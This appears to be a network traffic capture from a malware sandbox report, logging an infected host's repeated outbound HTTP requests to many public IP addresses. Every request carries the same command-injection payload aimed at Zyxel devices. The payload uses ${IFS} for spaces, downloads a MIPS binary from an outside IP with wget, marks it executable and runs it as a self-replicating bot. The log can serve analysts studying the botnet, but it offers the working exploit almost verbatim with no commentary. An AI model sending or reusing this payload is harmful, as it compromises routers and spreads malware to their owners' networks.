                                                Jan 12, 2024 18:24:34.804776907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4096192.168.2.1334918201.92.250.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804800034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4097192.168.2.1340862196.111.164.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804843903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4098192.168.2.13526404.17.219.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804883957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4099192.168.2.1337214152.148.148.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804924965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4100192.168.2.134978069.58.54.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804961920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4101192.168.2.136010237.6.36.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804981947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4102192.168.2.1336596185.98.58.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805038929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4103192.168.2.1352058218.83.19.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805090904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4104192.168.2.1345022201.84.1.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805116892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4105192.168.2.1347866130.53.131.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805136919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4106192.168.2.1352456210.229.221.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805175066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4107192.168.2.1339550152.8.251.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805222988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4108192.168.2.1351124154.185.36.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805258036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4109192.168.2.134524637.133.222.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805294037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4110192.168.2.1350428118.139.129.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805351019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4111192.168.2.1345018107.57.10.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805393934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4112192.168.2.1352590198.170.75.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805437088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4113192.168.2.1346752103.55.182.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805473089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4114192.168.2.1347316124.79.63.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805505991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4115192.168.2.1357498186.169.110.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805552006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4116192.168.2.133997249.235.64.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805588961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4117192.168.2.1354256112.159.81.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805608988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4118192.168.2.13497664.27.41.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805664062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4119192.168.2.133828859.125.0.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805706024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4120192.168.2.1359516173.150.234.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805753946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4121192.168.2.13609364.224.226.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805774927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4122192.168.2.1338570128.203.142.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805818081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4123192.168.2.135772882.118.81.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805851936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4124192.168.2.1340088213.74.132.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805891037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4125192.168.2.133936847.251.214.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805934906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4126192.168.2.1358614172.43.215.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.805970907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4127192.168.2.1345784210.92.178.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806001902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4128192.168.2.1358318107.10.39.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806025028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4129192.168.2.1342008174.169.139.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806062937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4130192.168.2.134369450.47.253.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806087017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4131192.168.2.135871660.35.126.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806149960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4132192.168.2.135295041.234.9.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806171894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4133192.168.2.1358934153.192.161.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806201935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4134192.168.2.135330483.127.167.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806247950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4135192.168.2.135901243.221.84.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806298018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4136192.168.2.1338282131.40.217.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806328058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4137192.168.2.1346532217.220.45.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806365013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4138192.168.2.134821095.221.112.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806412935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4139192.168.2.1345436124.49.243.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806467056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4140192.168.2.134243497.0.91.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806502104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4141192.168.2.1338378150.153.92.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806550026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4142192.168.2.1360386191.147.239.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806582928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4143192.168.2.133865236.82.83.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806634903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4144192.168.2.1344456223.4.239.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806668043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4145192.168.2.133724836.245.9.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806693077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4146192.168.2.1341784114.186.200.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806734085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4147192.168.2.1345646135.190.171.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806770086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4148192.168.2.135185269.193.145.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806818008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4149192.168.2.1337342180.187.71.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806866884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4150192.168.2.134335473.148.5.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806901932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4151192.168.2.134170260.223.81.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806925058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4152192.168.2.1360340110.110.183.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.806987047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4153192.168.2.135579276.88.120.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807020903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4154192.168.2.135734623.253.101.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807058096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4155192.168.2.1338464192.128.82.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807106018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4156192.168.2.134214495.58.214.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807147026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4157192.168.2.1339098114.25.124.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807174921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4158192.168.2.1333630117.118.220.116443
                                                TimestampBytes transferredDirectionData
